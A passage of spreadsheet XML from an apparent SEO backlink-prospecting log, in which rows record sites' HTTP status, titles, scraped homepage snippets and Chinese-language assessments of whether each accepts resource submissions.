        <x:v>Everything you need to know from starting a blog to selling products and services to achieve your blogging goals. Tracie Fobes, Blogging Coach Skip to content About Contact Make Money Blog Day To Day Blogging Increase Traffic Grow Your Email List Maintenance &amp; Tech Tracie Fobes Newbie Bloggers Amateur Bloggers Expert Bloggers Tracie’s Recommendations Courses Coaching Tracie Fobes Make The Money You’ve Always Wanted With Your Blog I believe blogging is the path to the freedom you want in your life. I can help you get there! Which stage are you in? Sick &amp; tired of the blogging hamster wheel? Have you been blogging for months but you aren’t making any money? Do you have questions but don’t even know what or who to ask? Have you hit a steady income but feel like you’ve hit a plateau and need help getting to</x:v>
      </x:c>
      <x:c r="R382" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S382" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T382" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://traciefobes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="383">
      <x:c r="A383" s="18" t="str">
        <x:v>382</x:v>
      </x:c>
      <x:c r="B383" s="19" t="str">
        <x:v>philophrosyne.com</x:v>
      </x:c>
      <x:c r="C383" s="19" t="str">
        <x:v>https://philophrosyne.com</x:v>
      </x:c>
      <x:c r="D383" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E383" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F383" s="20" t="str">
        <x:v>404</x:v>
      </x:c>
      <x:c r="G383" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H383" s="19" t="str">
        <x:v>https://philophrosyne.com/</x:v>
      </x:c>
      <x:c r="I383" s="19" t="str">
        <x:v>This store is unavailable</x:v>
      </x:c>
      <x:c r="J383" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K383" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L383" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M383" s="19" t="str">
        <x:v>https://philophrosyne.com/</x:v>
      </x:c>
      <x:c r="N383" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O383" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P383" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q383" s="21" t="str">
        <x:v>This store is unavailable Something went wrong. What happened? This store is unavailable What can I do? Return to the previous page. Request ID: 7746e58a-63d9-4ef2-b877-54d788883e93-1788322873</x:v>
      </x:c>
      <x:c r="R383" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S383" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T383" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://philophrosyne.com</x:v>
      </x:c>
    </x:row>
    <x:row r="384">
      <x:c r="A384" s="18" t="str">
        <x:v>383</x:v>
      </x:c>
      <x:c r="B384" s="19" t="str">
        <x:v>kbhwriting.com</x:v>
      </x:c>
      <x:c r="C384" s="19" t="str">
        <x:v>https://kbhwriting.com</x:v>
      </x:c>
      <x:c r="D384" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E384" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F384" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G384" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H384" s="19" t="str">
        <x:v>https://kbhwriting.com/</x:v>
      </x:c>
      <x:c r="I384" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J384" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K384" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L384" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M384" s="19" t="str">
        <x:v>https://kbhwriting.com/</x:v>
      </x:c>
      <x:c r="N384" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O384" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P384" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q384" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access kbhwriting.com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a349ba0a09292da1 &amp;bull; Your IP: Click </x:v>
      </x:c>
      <x:c r="R384" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S384" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T384" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://kbhwriting.com</x:v>
      </x:c>
    </x:row>
    <x:row r="385">
      <x:c r="A385" s="18" t="str">
        <x:v>384</x:v>
      </x:c>
      <x:c r="B385" s="19" t="str">
        <x:v>halal-foundation.com</x:v>
      </x:c>
      <x:c r="C385" s="19" t="str">
        <x:v>https://halal-foundation.com</x:v>
      </x:c>
      <x:c r="D385" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E385" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F385" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G385" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H385" s="19" t="str">
        <x:v>http://halal-foundation.com/</x:v>
      </x:c>
      <x:c r="I385" s="19" t="str">
        <x:v>Halal Foundation - Eat of what is halal and good</x:v>
      </x:c>
      <x:c r="J385" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K385" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L385" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M385" s="19" t="str">
        <x:v>http://halal-foundation.com/</x:v>
      </x:c>
      <x:c r="N385" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O385" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P385" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q385" s="21" t="str">
        <x:v>Halal Foundation - Eat of what is halal and good HALAL FOUNDATION - Eat of what is on Earth halal and good SM Home About Halal About Us GUIDANCE FROM THE QUR&amp;#39AN O ye who believe! Eat of what is on earth, halal and good, and do not follow the footsteps of the Evil One, for he is to you an avowed enemy. II: 168 O ye who believe! Forbid not the good things which God had made lawful for you, and transgress not. Lo God loveth not transgressors. Eat of that which God hath bestowed on you as food, lawful and good, and keep your duty to God in whom you are believers. V: 87-88 Halal Foundation was established by The Islamic Food and Nutrition Council of America (IFANCA), to provide objective infor</x:v>
      </x:c>
      <x:c r="R385" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S385" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T385" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://halal-foundation.com
http://halal-foundation.com</x:v>
      </x:c>
    </x:row>
    <x:row r="386">
      <x:c r="A386" s="18" t="str">
        <x:v>385</x:v>
      </x:c>
      <x:c r="B386" s="19" t="str">
        <x:v>teesvg.com</x:v>
      </x:c>
      <x:c r="C386" s="19" t="str">
        <x:v>https://teesvg.com</x:v>
      </x:c>
      <x:c r="D386" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E386" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F386" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G386" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H386" s="19" t="str">
        <x:v>https://teesvg.com/</x:v>
      </x:c>
      <x:c r="I386" s="19" t="str">
        <x:v>Teesvg | SVG Cut Files Shop</x:v>
      </x:c>
      <x:c r="J386" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K386" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L386" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M386" s="19" t="str">
        <x:v>https://teesvg.com/</x:v>
      </x:c>
      <x:c r="N386" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O386" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P386" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q386" s="21" t="str">
        <x:v>Teesvg offers high-quality SVG Cut Files, Printables and Vinyl Crafts compatible with Cricut, Silhouette and all major cutting machines. Teesvg | SVG Cut Files Shop Skip to content Follow Us Contact Us Unlimited Downloads My Purchase History Log In Search for: Cart total: $0.00 Menu Home SVG Shop Free SVG &amp; CLIPART PNG &amp; SVG Bundles Custom Bundles SVG Info/FAQ Contact Us F.A.Q Tutorials Download Guide Terms and Conditions Privacy Policy Refund Policy Anti-Spam Policy Safety Glasses Policy Credit Card Security Policy Order Custom SVG About Us Search for: Home The Best PNG &amp; SVG Designs for Shirts on Teesvg! Get, Print and Cut, Keep or Gift! Newest Designs I Used to Be in Charge Then I Had A Granddaughter SVG PNG Funny Grandpa And Granddaughter family humor for proud grandfather Cricut Shirt Design Decals Sticker SVG Files , Fa</x:v>
      </x:c>
      <x:c r="R386" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S386" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T386" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://teesvg.com</x:v>
      </x:c>
    </x:row>
    <x:row r="387">
      <x:c r="A387" s="18" t="str">
        <x:v>386</x:v>
      </x:c>
      <x:c r="B387" s="19" t="str">
        <x:v>sarahtitus.com</x:v>
      </x:c>
      <x:c r="C387" s="19" t="str">
        <x:v>https://sarahtitus.com</x:v>
      </x:c>
      <x:c r="D387" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E387" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F387" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G387" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H387" s="19" t="str">
        <x:v>https://www.sarahtitus.com/</x:v>
      </x:c>
      <x:c r="I387" s="19" t="str">
        <x:v>Sarah Titus</x:v>
      </x:c>
      <x:c r="J387" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K387" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L387" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M387" s="19" t="str">
        <x:v>https://www.sarahtitus.com/</x:v>
      </x:c>
      <x:c r="N387" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O387" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P387" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q387" s="21" t="str">
        <x:v>Get 5,500+ free printables to organize your life and grow your faith. Join millions of moms finding hope, inspiration, and how to make money from home doing something you love! Sarah Titus Top My Story New Shop Printables Activities HELLO! Collection Coloring Pages Word Search I-Spy Mazes Four in a Row Holidays Sarah Titus Free Cute Printables (5,500+) for Moms &amp; Teachers - Plus Christian Encouragement for Peaceful Living A-Z Lists Christian Home / Family Make Money Saving Money My Story NEW Shop Printables Activities Holiday A-Z Christian Home/Family browse by printable &gt; calendars hand lettering My Story Faith New Shop Printables After 14 years of marriage, my now-ex-husband abandoned our family and my two kids and we ended up homeless. Refusing to let someone else raise my kids, I worked hard as a single mom making money online to support my family. Through the </x:v>
      </x:c>
      <x:c r="R387" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S387" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T387" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sarahtitus.com</x:v>
      </x:c>
    </x:row>
    <x:row r="388">
      <x:c r="A388" s="18" t="str">
        <x:v>387</x:v>
      </x:c>
      <x:c r="B388" s="19" t="str">
        <x:v>studiomedicovisnatur.it</x:v>
      </x:c>
      <x:c r="C388" s="19" t="str">
        <x:v>https://studiomedicovisnatur.it</x:v>
      </x:c>
      <x:c r="D388" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E388" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F388" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G388" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H388" s="19" t="str">
        <x:v>https://www.studiomedicovisnatur.it/</x:v>
      </x:c>
      <x:c r="I388" s="19" t="str">
        <x:v>Studio Di Medicina Integrata Vis Natur: Scopri La Nostra Struttura</x:v>
      </x:c>
      <x:c r="J388" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K388" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L388" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M388" s="19" t="str">
        <x:v>https://www.studiomedicovisnatur.it/</x:v>
      </x:c>
      <x:c r="N388" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O388" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P388" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q388" s="21" t="str">
        <x:v>Nello Studio di Medicina Integrata Vis Natur, il dottor Claudio Antonini offre ai suoi pazienti la possibilità di ritrovare uno stato di salute e benessere. Studio Di Medicina Integrata Vis Natur: Scopri La Nostra Struttura Primary Menu HOME CHI SIAMO SERVIZI TRATTAMENTI TRATTAMENTI ANTICELLULITE TRATTAMENTI ESTETICI VISO MAGNETOTERAPIA ANALISI DEL METABOLISMO TEST DEL METABOLISMO BIORISONANZA MAGNETICA DOLORE OSTEO-ARTICOLARE INTOLLERANZE ALIMENTARI MEDICINA ESTETICA MEDICINA QUANTICA MEDICINA QUANTISTICA GALLERY TESTIMONIANZE BLOG CONTATTI su campi magnetici personalizzati EFFICACIA SCIENTIFICA BASATA sull'organismo SCOPRI funzionano in sinergia tra di loro. L'essere umano è un'entità unitaria MEDICINA QUANTISTICA in cui i vari organi e apparati con il team di Vis Natur! SENZA EFFETTI COLLATERALI LIBERI DAL DOLORE Inizia il tuo percorso di med</x:v>
      </x:c>
      <x:c r="R388" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S388" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T388" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://studiomedicovisnatur.it</x:v>
      </x:c>
    </x:row>
    <x:row r="389">
      <x:c r="A389" s="18" t="str">
        <x:v>388</x:v>
      </x:c>
      <x:c r="B389" s="19" t="str">
        <x:v>mamacheaps.com</x:v>
      </x:c>
      <x:c r="C389" s="19" t="str">
        <x:v>https://mamacheaps.com</x:v>
      </x:c>
      <x:c r="D389" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E389" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F389" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G389" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H389" s="19" t="str">
        <x:v>https://www.mamacheaps.com/</x:v>
      </x:c>
      <x:c r="I389" s="19" t="str">
        <x:v>Home - Mama Cheaps®</x:v>
      </x:c>
      <x:c r="J389" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K389" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L389" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M389" s="19" t="str">
        <x:v>https://www.mamacheaps.com/</x:v>
      </x:c>
      <x:c r="N389" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O389" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P389" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q389" s="21" t="str">
        <x:v>Home - Mama Cheaps® Skip to content Menu HOME About About Mama Cheaps Contact Disclosure Statement DIY PRINTABLES SHOP Valentine’s Day Easter Teacher Gift Ideas 4th of July Back to School Halloween Fall &amp; Thanksgiving Christmas Elf on the Shelf St. Patrick’s Day Travel Travel Tips and Reviews Disney World: Tips, Tricks, Reviews Disney Cruise: Tips, Tricks, Reviews Ice Hockey Tips Food Privacy Policy Subscribe SHOP Reader Faves Our most-loved posts that readers come back to again and again. What to Pack in Your Cruise Ship Carry-On Bag Everything you actually need in your cruise carry-on – plus the common items you can skip to save space. Little House on the Prairie Road Trip Follow Laura Ing</x:v>
      </x:c>
      <x:c r="R389" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S389" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T389" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://mamacheaps.com</x:v>
      </x:c>
    </x:row>
    <x:row r="390">
      <x:c r="A390" s="18" t="str">
        <x:v>389</x:v>
      </x:c>
      <x:c r="B390" s="19" t="str">
        <x:v>budgetingonadime.com</x:v>
      </x:c>
      <x:c r="C390" s="19" t="str">
        <x:v>https://budgetingonadime.com</x:v>
      </x:c>
      <x:c r="D390" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E390" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F390" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G390" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H390" s="19" t="str">
        <x:v>https://budgetingonadime.com/</x:v>
      </x:c>
      <x:c r="I390" s="19" t="str">
        <x:v>Achieving Financial Freedom, One Dime at a Time</x:v>
      </x:c>
      <x:c r="J390" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K390" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L390" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M390" s="19" t="str">
        <x:v>https://budgetingonadime.com/</x:v>
      </x:c>
      <x:c r="N390" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O390" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P390" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q390" s="21" t="str">
        <x:v>Your go-to source for strategies on budgeting, saving money and achieving financial freedom. Achieving Financial Freedom, One Dime at a Time Budgeting on a Dime Achieving Financial Freedom, One Dime at a Time Menu Home About Contact Me Disclaimer Privacy Policy Rewards Hub Budgeting Tools Menu Things to Make with Strawberries: Fresh Strawberry Recipes for Brunch Inspiration Posted on May 25, 2026 May 25, 2026 by Katie A single flat of strawberries at peak season costs about $8 at most farmers markets. With two flats and a few pantry staples, you can set a brunch table that looks like you spent the morning in a bakery — and nobody has to know you did most of it the night before. That’s the… Read more Things to Make with Strawberries: Easy Homemade Strawberry Cake Recipes Posted on Ma</x:v>
      </x:c>
      <x:c r="R390" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S390" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T390" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://budgetingonadime.com</x:v>
      </x:c>
    </x:row>
    <x:row r="391">
      <x:c r="A391" s="18" t="str">
        <x:v>390</x:v>
      </x:c>
      <x:c r="B391" s="19" t="str">
        <x:v>sassmagazine.com</x:v>
      </x:c>
      <x:c r="C391" s="19" t="str">
        <x:v>https://sassmagazine.com</x:v>
      </x:c>
      <x:c r="D391" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E391" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F391" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G391" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H391" s="19" t="str">
        <x:v>https://sassmagazine.com/</x:v>
      </x:c>
      <x:c r="I391" s="19" t="str">
        <x:v>Sass Magazine</x:v>
      </x:c>
      <x:c r="J391" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K391" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L391" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M391" s="19" t="str">
        <x:v>https://sassmagazine.com/</x:v>
      </x:c>
      <x:c r="N391" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O391" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P391" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q391" s="21" t="str">
        <x:v>Sass Magazine is a women's lifestyle &amp; business publication in Frederick, MD with topics like entrepreneurship, wellness, style &amp; travel. Sass Magazine Skip to content Subscribe Advertise Advertising Opportunites Download Media Kit The LOVE Issue Events Events Calendar Submit Your Event Sass Event Sponsorships Nominate Top Women Woman to Watch Current Issue Contact Sass Choice Awards Business Thriving in a Multigenerational Workplace: Bridging the Gap Boost Your Efficiency: The 7 Must-Have Software Programs for Small Business Owners Money Moves and Investments Every Woman Needs by 40 Career Finance Productivity Entrepreneurship Marketing Social Media Work/Life Balance Empowerment The Power of Saying No: How to Set Boundaries Without Guilt What Are Glimmers and How They Can Impact Your Mental Health What is Astrology: A Beginne</x:v>
      </x:c>
      <x:c r="R391" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S391" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T391" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://sassmagazine.com</x:v>
      </x:c>
    </x:row>
    <x:row r="392">
      <x:c r="A392" s="18" t="str">
        <x:v>391</x:v>
      </x:c>
      <x:c r="B392" s="19" t="str">
        <x:v>dressesanddinosaurs.com</x:v>
      </x:c>
      <x:c r="C392" s="19" t="str">
        <x:v>https://dressesanddinosaurs.com</x:v>
      </x:c>
      <x:c r="D392" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E392" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F392" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G392" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H392" s="19" t="str">
        <x:v>https://dressesanddinosaurs.com/</x:v>
      </x:c>
      <x:c r="I392" s="19" t="str">
        <x:v>Dresses and Dinosaurs - Surviving Mommyhood...One Day at a Time</x:v>
      </x:c>
      <x:c r="J392" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K392" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L392" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M392" s="19" t="str">
        <x:v>https://dressesanddinosaurs.com/</x:v>
      </x:c>
      <x:c r="N392" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O392" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P392" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q392" s="21" t="str">
        <x:v>Surviving Mommyhood...One Day at a Time Dresses and Dinosaurs - Surviving Mommyhood...One Day at a Time Skip to content Home Motherhood Holidays Parenting Kids Activities Pregnancy About Me Work with Me Main Menu Home Motherhood Holidays Parenting Kids Activities Pregnancy About Me Work with Me Free Printable Earth Day Word Search for Kids Leave a Comment / Holidays / By Stephanie Eddy Fun Earth Day Activity for Kids Every year on April 22nd, we celebrate Earth Day. It is a day that we can teach younger kids and older kids how to preserve the Earth, including easy ways that they can help. There are a lot of fun activities that you can do together as part of &amp;hellip; Free Printable Earth Day Word Search for Kids Read More &amp;raquo; Z</x:v>
      </x:c>
      <x:c r="R392" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S392" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T392" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://dressesanddinosaurs.com</x:v>
      </x:c>
    </x:row>
    <x:row r="393">
      <x:c r="A393" s="18" t="str">
        <x:v>392</x:v>
      </x:c>
      <x:c r="B393" s="19" t="str">
        <x:v>ispyfabulous.com</x:v>
      </x:c>
      <x:c r="C393" s="19" t="str">
        <x:v>https://ispyfabulous.com</x:v>
      </x:c>
      <x:c r="D393" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E393" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F393" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G393" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H393" s="19" t="str">
        <x:v>https://www.ispyfabulous.com/</x:v>
      </x:c>
      <x:c r="I393" s="19" t="str">
        <x:v>I Spy Fabulous - The Modern Woman's Survival Guide</x:v>
      </x:c>
      <x:c r="J393" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K393" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L393" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M393" s="19" t="str">
        <x:v>https://www.ispyfabulous.com/</x:v>
      </x:c>
      <x:c r="N393" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O393" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P393" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q393" s="21" t="str">
        <x:v>The Modern Woman's Survival Guide I Spy Fabulous - The Modern Woman's Survival Guide I Spy Fabulous Beauty Celebrations Wellness Decor Shopping Style Family Resources Celebrations A Sweet Gingerbread Burr Basket Eats The No Bake Cookie Butter Pie You Need Right Now Deals My Cozytober Wantable Box: What I Got &amp; What I Kept Deals Splurge or Save: French Blue Lamps from $35 each and up! Deals Protect Your Identity with Zenni ID Guard Lenses Decor 5 West Elm Rug Dupes: Colca, Souk Wool, Almond Valley, Faded &amp;hellip; Deals Splurge or Save: Navy Blue Rue Four Door Buffet Celebrations A Cheeseburger and Fries Themed Birthday E / November 9, 2025 Celebrations A Sweet Gingerbread Burr Basket I love the Burr Basket trend. It’s such a </x:v>
      </x:c>
      <x:c r="R393" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S393" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T393" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://ispyfabulous.com</x:v>
      </x:c>
    </x:row>
    <x:row r="394">
      <x:c r="A394" s="18" t="str">
        <x:v>393</x:v>
      </x:c>
      <x:c r="B394" s="19" t="str">
        <x:v>fobwp.com</x:v>
      </x:c>
      <x:c r="C394" s="19" t="str">
        <x:v>https://fobwp.com</x:v>
      </x:c>
      <x:c r="D394" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E394" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F394" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G394" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H394" s="19" t="str">
        <x:v>https://www.fobwp.com/</x:v>
      </x:c>
      <x:c r="I394" s="19" t="str">
        <x:v>website design for small business</x:v>
      </x:c>
      <x:c r="J394" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K394" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L394" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M394" s="19" t="str">
        <x:v>https://www.fobwp.com/</x:v>
      </x:c>
      <x:c r="N394" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O394" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P394" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q394" s="21" t="str">
